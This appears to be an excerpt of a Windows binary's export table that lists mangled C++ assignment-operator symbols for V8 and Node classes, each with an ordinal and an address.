                                  ??4I32PairToBigIntDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16970x140077990
                                  ??4I32PairToBigIntDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z16980x140077990
                                  ??4I64ToBigIntDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z16990x140077990
                                  ??4I64ToBigIntDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z17000x140077990
                                  ??4IdleEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z17010x1400769f0
                                  ??4IdleEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@AEBU0123@@Z17020x1400769f0
                                  ??4Inputs@Node@compiler@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z17030x140077a10
                                  ??4Inputs@Node@compiler@internal@v8@@QEAAAEAV01234@AEBV01234@@Z17040x140077a00
                                  ??4Inspectable@V8InspectorSession@v8_inspector@@QEAAAEAV012@AEBV012@@Z17050x1400769f0
                                  ??4InstantiationResultResolver@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17060x1400769f0
                                  ??4InstructionOperand@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17070x140076a30
                                  ??4InstructionOperand@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17080x140076a30
                                  ??4Int16Array@v8@@QEAAAEAV01@$$QEAV01@@Z17090x1400769f0
                                  ??4Int16Array@v8@@QEAAAEAV01@AEBV01@@Z17100x1400769f0
                                  ??4Int32@v8@@QEAAAEAV01@$$QEAV01@@Z17110x1400769f0
                                  ??4Int32@v8@@QEAAAEAV01@AEBV01@@Z17120x1400769f0
                                  ??4Int32Array@v8@@QEAAAEAV01@$$QEAV01@@Z17130x1400769f0
                                  ??4Int32Array@v8@@QEAAAEAV01@AEBV01@@Z17140x1400769f0
                                  ??4Int64LoweringSpecialCase@compiler@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z17150x14041a190
                                  ??4Int64LoweringSpecialCase@compiler@internal@v8@@QEAAAEAU0123@AEBU0123@@Z17160x14041a230
                                  ??4Int8Array@v8@@QEAAAEAV01@$$QEAV01@@Z17170x1400769f0
                                  ??4Int8Array@v8@@QEAAAEAV01@AEBV01@@Z17180x1400769f0
                                  ??4Integer@v8@@QEAAAEAV01@$$QEAV01@@Z17190x1400769f0
                                  ??4Integer@v8@@QEAAAEAV01@AEBV01@@Z17200x1400769f0
                                  ??4InterpretedFrameDeleter@wasm@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z17210x1400769f0
                                  ??4InterpretedFrameDeleter@wasm@internal@v8@@QEAAAEAU0123@AEBU0123@@Z17220x1400769f0
                                  ??4InterpreterDispatchDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17230x140077990
                                  ??4InterpreterDispatchDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z17240x140077990
                                  ??4InvalidatedSlotsCleanup@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17250x140420300
                                  ??4InvalidatedSlotsCleanup@internal@v8@@QEAAAEAV012@AEBV012@@Z17260x140420390
                                  ??4InvalidatedSlotsFilter@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17270x140420410
                                  ??4InvalidatedSlotsFilter@internal@v8@@QEAAAEAV012@AEBV012@@Z17280x1404204a0
                                  ??4IrOpcode@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17290x1400769f0
                                  ??4IrOpcode@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17300x1400769f0
                                  ??4IrregexpInterpreter@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17310x1400769f0
                                  ??4IrregexpInterpreter@internal@v8@@QEAAAEAV012@AEBV012@@Z17320x1400769f0
                                  ??4IsolatePlatformDelegate@node@@QEAAAEAV01@$$QEAV01@@Z17330x1400769f0
                                  ??4IsolatePlatformDelegate@node@@QEAAAEAV01@AEBV01@@Z17340x1400769f0
                                  ??4JSFunctionRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17350x140077a00
                                  ??4JSFunctionRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17360x140077a00
                                  ??4JSHeapCopyReducer@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17370x140077990
                                  ??4JSHeapCopyReducer@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17380x140077990
                                  ??4JSON@v8@@QEAAAEAV01@$$QEAV01@@Z17390x1400769f0
                                  ??4JSON@v8@@QEAAAEAV01@AEBV01@@Z17400x1400769f0
                                  ??4JumpTableTargetOffset@interpreter@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z17410x140076a40
                                  ??4JumpTableTargetOffset@interpreter@internal@v8@@QEAAAEAU0123@AEBU0123@@Z17420x140076a30
                                  ??4JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17430x1406778f0
                                  ??4JumpTableTargetOffsets@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17440x140077790
                                  ??4JumpThreading@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17450x1400769f0
                                  ??4JumpThreading@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17460x1400769f0
                                  ??4LayoutDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17470x140076a30
                                  ??4LayoutDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z17480x140076a30
                                  ??4LiveEdit@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17490x1400769f0
                                  ??4LiveEdit@internal@v8@@QEAAAEAV012@AEBV012@@Z17500x1400769f0
                                  ??4LocalAllocationBuffer@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17510x1408cfc40
                                  ??4LocalDeclEncoder@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17520x14052d610
                                  ??4LocalDeclEncoder@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17530x14052d790
                                  ??4Location@debug@v8@@QEAAAEAV012@$$QEAV012@@Z17540x140420520
                                  ??4Location@debug@v8@@QEAAAEAV012@AEBV012@@Z17550x140420540
                                  ??4Location@v8@@QEAAAEAV01@$$QEAV01@@Z17560x140076a40
                                  ??4Location@v8@@QEAAAEAV01@AEBV01@@Z17570x140076a30
                                  ??4LoopFinder@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17580x1400769f0
                                  ??4LoopFinder@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17590x1400769f0
                                  ??4Malloced@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17600x1400769f0
                                  ??4Malloced@internal@v8@@QEAAAEAV012@AEBV012@@Z17610x1400769f0
                                  ??4Map@v8@@QEAAAEAV01@$$QEAV01@@Z17620x1400769f0
                                  ??4Map@v8@@QEAAAEAV01@AEBV01@@Z17630x1400769f0
                                  ??4MapRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17640x140077a00
                                  ??4MapRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17650x140077a00
                                  ??4MarkingWorklists@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17660x140419e30
                                  ??4MarkingWorklists@internal@v8@@QEAAAEAV012@AEBV012@@Z17670x140419fb0
                                  ??4MeasureMemoryDelegate@internal@v8@@QEAAAEAV012@AEBV012@@Z17680x1408ed100
                                  ??4MeasureMemoryDelegate@v8@@QEAAAEAV01@AEBV01@@Z17690x1400769f0
                                  ??4MemoryChunkLayout@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17700x1400769f0
                                  ??4MemoryChunkLayout@internal@v8@@QEAAAEAV012@AEBV012@@Z17710x1400769f0
                                  ??4MemoryMappedFile@OS@base@v8@@QEAAAEAV0123@AEBV0123@@Z17720x1400769f0
                                  ??4Message@v8@@QEAAAEAV01@$$QEAV01@@Z17730x1400769f0
                                  ??4Message@v8@@QEAAAEAV01@AEBV01@@Z17740x1400769f0
                                  ??4MessageLocation@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17750x140420560
                                  ??4MessageLocation@internal@v8@@QEAAAEAV012@AEBV012@@Z17760x1400778e0
                                  ??4Module@v8@@QEAAAEAV01@$$QEAV01@@Z17770x1400769f0
                                  ??4Module@v8@@QEAAAEAV01@AEBV01@@Z17780x1400769f0
                                  ??4ModuleWireBytes@wasm@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z17790x140077a00
                                  ??4ModuleWireBytes@wasm@internal@v8@@QEAAAEAU0123@AEBU0123@@Z17800x140077a00
                                  ??4MultiIsolatePlatform@node@@QEAAAEAV01@AEBV01@@Z17810x1400769f0
                                  ??4Name@v8@@QEAAAEAV01@$$QEAV01@@Z17820x1400769f0
                                  ??4Name@v8@@QEAAAEAV01@AEBV01@@Z17830x1400769f0
                                  ??4NameDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17840x140076a30
                                  ??4NameDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z17850x140076a30
                                  ??4NativeContextInferrer@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17860x1400769f0
                                  ??4NativeContextInferrer@internal@v8@@QEAAAEAV012@AEBV012@@Z17870x1400769f0
                                  ??4NativeContextStats@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17880x14041a190
                                  ??4NativeContextStats@internal@v8@@QEAAAEAV012@AEBV012@@Z17890x14041a230
                                  ??4NodeProperties@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z17900x1400769f0
                                  ??4NodeProperties@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z17910x1400769f0
                                  ??4Number@v8@@QEAAAEAV01@$$QEAV01@@Z17920x1400769f0
                                  ??4Number@v8@@QEAAAEAV01@AEBV01@@Z17930x1400769f0
                                  ??4NumberObject@v8@@QEAAAEAV01@$$QEAV01@@Z17940x1400769f0
                                  ??4NumberObject@v8@@QEAAAEAV01@AEBV01@@Z17950x1400769f0
                                  ??4OSROptimizedCodeCache@internal@v8@@QEAAAEAV012@$$QEAV012@@Z17960x140076a30
                                  ??4OSROptimizedCodeCache@internal@v8@@QEAAAEAV012@AEBV012@@Z17970x140076a30
                                  ??4Object@v8@@QEAAAEAV01@$$QEAV01@@Z17980x1400769f0
                                  ??4Object@v8@@QEAAAEAV01@AEBV01@@Z17990x1400769f0
                                  ??4ObjectHashSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18000x140076a30
                                  ??4ObjectHashSet@internal@v8@@QEAAAEAV012@AEBV012@@Z18010x140076a30
                                  ??4ObjectHashTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18020x140076a30
                                  ??4ObjectHashTable@internal@v8@@QEAAAEAV012@AEBV012@@Z18030x140076a30
                                  ??4ObjectIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18040x1400769f0
                                  ??4ObjectRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18050x140453040
                                  ??4ObjectRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18060x140077a00
                                  ??4ObjectTemplate@v8@@QEAAAEAV01@$$QEAV01@@Z18070x1400769f0
                                  ??4ObjectTemplate@v8@@QEAAAEAV01@AEBV01@@Z18080x1400769f0
                                  ??4OffThreadFactory@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18090x140076a30
                                  ??4OffThreadFactory@internal@v8@@QEAAAEAV012@AEBV012@@Z18100x140076a30
                                  ??4OrderedHashMap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18110x140076a30
                                  ??4OrderedHashMap@internal@v8@@QEAAAEAV012@AEBV012@@Z18120x140076a30
                                  ??4OrderedHashMapHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18130x1400769f0
                                  ??4OrderedHashMapHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z18140x1400769f0
                                  ??4OrderedHashSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18150x140076a30
                                  ??4OrderedHashSet@internal@v8@@QEAAAEAV012@AEBV012@@Z18160x140076a30
                                  ??4OrderedHashSetHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18170x1400769f0
                                  ??4OrderedHashSetHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z18180x1400769f0
                                  ??4OrderedNameDictionaryHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18190x1400769f0
                                  ??4OrderedNameDictionaryHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z18200x1400769f0
                                  ??4OutputStream@v8@@QEAAAEAV01@AEBV01@@Z18210x1400769f0
                                  ??4PagedSpaceIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18220x140077a10
                                  ??4PagedSpaceIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18230x140077a00
                                  ??4PagedSpaceObjectIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18240x140420590
                                  ??4PagedSpaceObjectIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18250x140420590
                                  ??4PeeledIteration@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18260x1400769f0
                                  ??4PeeledIteration@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18270x1400769f0
                                  ??4PersistentHandleVisitor@v8@@QEAAAEAV01@AEBV01@@Z18280x1400769f0
                                  ??4Primitive@v8@@QEAAAEAV01@$$QEAV01@@Z18290x1400769f0
                                  ??4Primitive@v8@@QEAAAEAV01@AEBV01@@Z18300x1400769f0
                                  ??4PrimitiveArray@v8@@QEAAAEAV01@$$QEAV01@@Z18310x1400769f0
                                  ??4PrimitiveArray@v8@@QEAAAEAV01@AEBV01@@Z18320x1400769f0
                                  ??4Private@v8@@QEAAAEAV01@$$QEAV01@@Z18330x1400769f0
                                  ??4Private@v8@@QEAAAEAV01@AEBV01@@Z18340x1400769f0
                                  ??4ProgramEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z18350x1400769f0
                                  ??4ProgramEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@AEBU0123@@Z18360x1400769f0
                                  ??4Promise@v8@@QEAAAEAV01@$$QEAV01@@Z18370x1400769f0
                                  ??4Promise@v8@@QEAAAEAV01@AEBV01@@Z18380x1400769f0
                                  ??4Proxy@v8@@QEAAAEAV01@$$QEAV01@@Z18390x1400769f0
                                  ??4Proxy@v8@@QEAAAEAV01@AEBV01@@Z18400x1400769f0
                                  ??4RandomNumberGenerator@base@v8@@QEAAAEAV012@$$QEAV012@@Z18410x1400777b0
                                  ??4RandomNumberGenerator@base@v8@@QEAAAEAV012@AEBV012@@Z18420x140077790
                                  ??4Reducer@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18430x1400769f0
                                  ??4RegExp@v8@@QEAAAEAV01@$$QEAV01@@Z18440x1400769f0
                                  ??4RegExp@v8@@QEAAAEAV01@AEBV01@@Z18450x1400769f0
                                  ??4RegExpMatchInfo@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18460x140076a30
                                  ??4RegExpMatchInfo@internal@v8@@QEAAAEAV012@AEBV012@@Z18470x140076a30
                                  ??4RegExpParser@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18480x1406a4340
                                  ??4RegExpParser@internal@v8@@QEAAAEAV012@AEBV012@@Z18490x1406a43d0
                                  ??4Register@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18500x1404205c0
                                  ??4Register@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18510x1404205c0
                                  ??4RemoteObject@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z18520x1400769f0
                                  ??4RemoteObject@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z18530x1400769f0
                                  ??4RepresentationChanger@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18540x140fd2d30
                                  ??4RepresentationChanger@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18550x1400778e0
                                  ??4Resolver@Promise@v8@@QEAAAEAV012@$$QEAV012@@Z18560x1400769f0
                                  ??4Resolver@Promise@v8@@QEAAAEAV012@AEBV012@@Z18570x1400769f0
                                  ??4ResourceConstraints@v8@@QEAAAEAV01@$$QEAV01@@Z18580x140077740
                                  ??4ResourceConstraints@v8@@QEAAAEAV01@AEBV01@@Z18590x1400775c0
                                  ??4ResumeJumpTarget@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18600x140dd7e40
                                  ??4ResumeJumpTarget@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18610x140420540
                                  ??4RootEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z18620x1400769f0
                                  ??4RootEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@AEBU0123@@Z18630x1400769f0
                                  ??4ScannerStream@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18640x1400769f0
                                  ??4ScannerStream@internal@v8@@QEAAAEAV012@AEBV012@@Z18650x1400769f0
                                  ??4ScheduleVerifier@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18660x1400769f0
                                  ??4ScheduleVerifier@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18670x1400769f0
                                  ??4Script@debug@v8@@QEAAAEAV012@$$QEAV012@@Z18680x1400769f0
                                  ??4Script@debug@v8@@QEAAAEAV012@AEBV012@@Z18690x1400769f0
                                  ??4Script@v8@@QEAAAEAV01@$$QEAV01@@Z18700x1400769f0
                                  ??4Script@v8@@QEAAAEAV01@AEBV01@@Z18710x1400769f0
                                  ??4ScriptCompiler@v8@@QEAAAEAV01@$$QEAV01@@Z18720x1400769f0
                                  ??4ScriptCompiler@v8@@QEAAAEAV01@AEBV01@@Z18730x1400769f0
                                  ??4ScriptData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z18740x14041fd00
                                  ??4ScriptData@TypeProfile@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z18750x14041fd00
                                  ??4ScriptOrModule@v8@@QEAAAEAV01@$$QEAV01@@Z18760x1400769f0
                                  ??4ScriptOrModule@v8@@QEAAAEAV01@AEBV01@@Z18770x1400769f0
                                  ??4ScriptStreamingTask@ScriptCompiler@v8@@QEAAAEAV012@$$QEAV012@@Z18780x140076a30
                                  ??4ScriptStreamingTask@ScriptCompiler@v8@@QEAAAEAV012@AEBV012@@Z18790x140076a30
                                  ??4SearchMatch@API@Debugger@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z18800x1400769f0
                                  ??4SearchMatch@API@Debugger@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z18810x1400769f0
                                  ??4Set@v8@@QEAAAEAV01@$$QEAV01@@Z18820x1400769f0
                                  ??4Set@v8@@QEAAAEAV01@AEBV01@@Z18830x1400769f0
                                  ??4SharedArrayBuffer@v8@@QEAAAEAV01@$$QEAV01@@Z18840x1400769f0
                                  ??4SharedArrayBuffer@v8@@QEAAAEAV01@AEBV01@@Z18850x1400769f0
                                  ??4SharedFunctionInfoRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18860x140077a00
                                  ??4SharedFunctionInfoRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18870x140077a00
                                  ??4SharedMemoryStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z18880x1400777b0
                                  ??4SharedMemoryStatistics@v8@@QEAAAEAV01@AEBV01@@Z18890x140077790
                                  ??4Signature@v8@@QEAAAEAV01@$$QEAV01@@Z18900x1400769f0
                                  ??4Signature@v8@@QEAAAEAV01@AEBV01@@Z18910x1400769f0
                                  ??4SignatureMap@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18920x1404205d0
                                  ??4SourceIdAssigner@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z18930x140e4dba0
                                  ??4SourceIdAssigner@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z18940x140e4dcc0
                                  ??4SourcePositionTableBuilder@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18950x140420710
                                  ??4SourcePositionTableBuilder@internal@v8@@QEAAAEAV012@AEBV012@@Z18960x1404207e0
                                  ??4SourcePositionTableIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z18970x140420880
                                  ??4SourcePositionTableIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18980x1404208c0
                                  ??4SpaceIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z18990x1404208f0
                                  ??4Stack@base@v8@@QEAAAEAV012@$$QEAV012@@Z19000x1400769f0
                                  ??4Stack@base@v8@@QEAAAEAV012@AEBV012@@Z19010x1400769f0
                                  ??4StackFrame@v8@@QEAAAEAV01@$$QEAV01@@Z19020x1400769f0
                                  ??4StackFrame@v8@@QEAAAEAV01@AEBV01@@Z19030x1400769f0
                                  ??4StackTrace@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z19040x1400769f0
                                  ??4StackTrace@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z19050x1400769f0
                                  ??4StackTrace@debug@base@v8@@QEAAAEAV0123@AEBV0123@@Z19060x140dbf330
                                  ??4StackTrace@v8@@QEAAAEAV01@$$QEAV01@@Z19070x1400769f0
                                  ??4StackTrace@v8@@QEAAAEAV01@AEBV01@@Z19080x1400769f0
                                  ??4StackTraceId@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z19090x1400769f0
                                  ??4StackTraceId@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z19100x1400769f0
                                  ??4StartupData@v8@@QEAAAEAV01@$$QEAV01@@Z19110x140077a10
                                  ??4StartupData@v8@@QEAAAEAV01@AEBV01@@Z19120x140077a00
                                  ??4StateValuesAccess@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19130x140076a30
                                  ??4StateValuesAccess@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19140x140076a30
                                  ??4StreamingProcessor@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19150x1400769f0
                                  ??4String@v8@@QEAAAEAV01@$$QEAV01@@Z19160x1400769f0
                                  ??4String@v8@@QEAAAEAV01@AEBV01@@Z19170x1400769f0
                                  ??4StringBuffer@v8_inspector@@QEAAAEAV01@AEBV01@@Z19180x1400769f0
                                  ??4StringHasher@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19190x1400769f0
                                  ??4StringHasher@internal@v8@@QEAAAEAV012@AEBV012@@Z19200x1400769f0
                                  ??4StringObject@v8@@QEAAAEAV01@$$QEAV01@@Z19210x1400769f0
                                  ??4StringObject@v8@@QEAAAEAV01@AEBV01@@Z19220x1400769f0
                                  ??4StringTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19230x140076a30
                                  ??4StringTable@internal@v8@@QEAAAEAV012@AEBV012@@Z19240x140076a30
                                  ??4StringTableShape@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19250x1400769f0
                                  ??4StringTableShape@internal@v8@@QEAAAEAV012@AEBV012@@Z19260x1400769f0
                                  ??4StringView@v8_inspector@@QEAAAEAV01@$$QEAV01@@Z19270x140420910
                                  ??4StringView@v8_inspector@@QEAAAEAV01@AEBV01@@Z19280x140077790
                                  ??4Symbol@v8@@QEAAAEAV01@$$QEAV01@@Z19290x1400769f0
                                  ??4Symbol@v8@@QEAAAEAV01@AEBV01@@Z19300x1400769f0
                                  ??4SymbolObject@v8@@QEAAAEAV01@$$QEAV01@@Z19310x1400769f0
                                  ??4SymbolObject@v8@@QEAAAEAV01@AEBV01@@Z19320x1400769f0
                                  ??4Template@v8@@QEAAAEAV01@$$QEAV01@@Z19330x1400769f0
                                  ??4Template@v8@@QEAAAEAV01@AEBV01@@Z19340x1400769f0
                                  ??4Thread@WasmInterpreter@wasm@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z19350x1400769f0
                                  ??4Thread@WasmInterpreter@wasm@internal@v8@@QEAAAEAV01234@AEBV01234@@Z19360x1400769f0
                                  ??4ThreadTicks@base@v8@@QEAAAEAV012@$$QEAV012@@Z19370x140076a30
                                  ??4ThreadTicks@base@v8@@QEAAAEAV012@AEBV012@@Z19380x140076a30
                                  ??4TickSample@internal@v8@@QEAAAEAU012@$$QEAU012@@Z19390x1406cc6f0
                                  ??4TickSample@internal@v8@@QEAAAEAU012@AEBU012@@Z19400x1406cc7e0
                                  ??4Time@base@v8@@QEAAAEAV012@$$QEAV012@@Z19410x140076a30
                                  ??4Time@base@v8@@QEAAAEAV012@AEBV012@@Z19420x140076a30
                                  ??4TimeDelta@base@v8@@QEAAAEAV012@$$QEAV012@@Z19430x140076a30
                                  ??4TimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z19440x140076a30
                                  ??4TimeTicks@base@v8@@QEAAAEAV012@$$QEAV012@@Z19450x140076a30
                                  ??4TimeTicks@base@v8@@QEAAAEAV012@AEBV012@@Z19460x140076a30
                                  ??4Token@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19470x1400769f0
                                  ??4Token@internal@v8@@QEAAAEAV012@AEBV012@@Z19480x1400769f0
                                  ??4TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAAAEAV012@AEBV012@@Z19490x1400769f0
                                  ??4Type@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z19500x140076a30
                                  ??4Type@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z19510x140076a30
                                  ??4TypeProfile@debug@v8@@QEAAAEAV012@$$QEAV012@@Z19520x14041fee0
                                  ??4TypedArray@v8@@QEAAAEAV01@$$QEAV01@@Z19530x1400769f0
                                  ??4TypedArray@v8@@QEAAAEAV01@AEBV01@@Z19540x1400769f0
                                  ??4TypedSlotSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19550x140420940
                                  ??4TypedSlotSet@internal@v8@@QEAAAEAV012@AEBV012@@Z19560x140420940
                                  ??4TypedSlots@internal@v8@@QEAAAEAV012@AEBV012@@Z19570x140420960
                                  ??4Uint16Array@v8@@QEAAAEAV01@$$QEAV01@@Z19580x1400769f0
                                  ??4Uint16Array@v8@@QEAAAEAV01@AEBV01@@Z19590x1400769f0
                                  ??4Uint32@v8@@QEAAAEAV01@$$QEAV01@@Z19600x1400769f0
                                  ??4Uint32@v8@@QEAAAEAV01@AEBV01@@Z19610x1400769f0
                                  ??4Uint32Array@v8@@QEAAAEAV01@$$QEAV01@@Z19620x1400769f0
                                  ??4Uint32Array@v8@@QEAAAEAV01@AEBV01@@Z19630x1400769f0
                                  ??4Uint8Array@v8@@QEAAAEAV01@$$QEAV01@@Z19640x1400769f0
                                  ??4Uint8Array@v8@@QEAAAEAV01@AEBV01@@Z19650x1400769f0
                                  ??4Uint8ClampedArray@v8@@QEAAAEAV01@$$QEAV01@@Z19660x1400769f0
                                  ??4Uint8ClampedArray@v8@@QEAAAEAV01@AEBV01@@Z19670x1400769f0
                                  ??4UnboundModuleScript@v8@@QEAAAEAV01@$$QEAV01@@Z19680x1400769f0
                                  ??4UnboundModuleScript@v8@@QEAAAEAV01@AEBV01@@Z19690x1400769f0
                                  ??4UnboundScript@v8@@QEAAAEAV01@$$QEAV01@@Z19700x1400769f0
                                  ??4UnboundScript@v8@@QEAAAEAV01@AEBV01@@Z19710x1400769f0
                                  ??4Unlocker@v8@@QEAAAEAV01@AEBV01@@Z19720x140076a30
                                  ??4UnoptimizedCompileFlags@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19730x140420980
                                  ??4UnoptimizedCompileFlags@internal@v8@@QEAAAEAV012@AEBV012@@Z19740x140420540
                                  ??4UnresolvedEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z19750x1400769f0
                                  ??4UnresolvedEntryCreateTrait@CodeEntry@internal@v8@@QEAAAEAU0123@AEBU0123@@Z19760x1400769f0
                                  ??4Unwinder@v8@@QEAAAEAV01@$$QEAV01@@Z19770x1400769f0
                                  ??4Unwinder@v8@@QEAAAEAV01@AEBV01@@Z19780x1400769f0
                                  ??4Uses@Node@compiler@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z19790x140076a30
                                  ??4Uses@Node@compiler@internal@v8@@QEAAAEAV01234@AEBV01234@@Z19800x140076a30
                                  ??4Utf8@unibrow@@QEAAAEAV01@$$QEAV01@@Z19810x1400769f0
                                  ??4Utf8@unibrow@@QEAAAEAV01@AEBV01@@Z19820x1400769f0
                                  ??4Utf8Decoder@internal@v8@@QEAAAEAV012@$$QEAV012@@Z19830x1404209a0
                                  ??4Utf8Decoder@internal@v8@@QEAAAEAV012@AEBV012@@Z19840x140420540
                                  ??4V8@v8@@QEAAAEAV01@$$QEAV01@@Z19850x1400769f0
                                  ??4V8@v8@@QEAAAEAV01@AEBV01@@Z19860x1400769f0
                                  ??4V8Inspector@v8_inspector@@QEAAAEAV01@AEBV01@@Z19870x1400769f0
                                  ??4V8InspectorClient@v8_inspector@@QEAAAEAV01@AEBV01@@Z19880x1400769f0
                                  ??4V8InspectorSession@v8_inspector@@QEAAAEAV01@AEBV01@@Z19890x1400769f0
                                  ??4V8StackTrace@v8_inspector@@QEAAAEAV01@AEBV01@@Z19900x1400769f0
                                  ??4V8StackTraceId@v8_inspector@@QEAAAEAU01@$$QEAU01@@Z19910x1404209c0
                                  ??4V8StackTraceId@v8_inspector@@QEAAAEAU01@AEBU01@@Z19920x1404209c0
                                  ??4Value@v8@@QEAAAEAV01@$$QEAV01@@Z19930x1400769f0
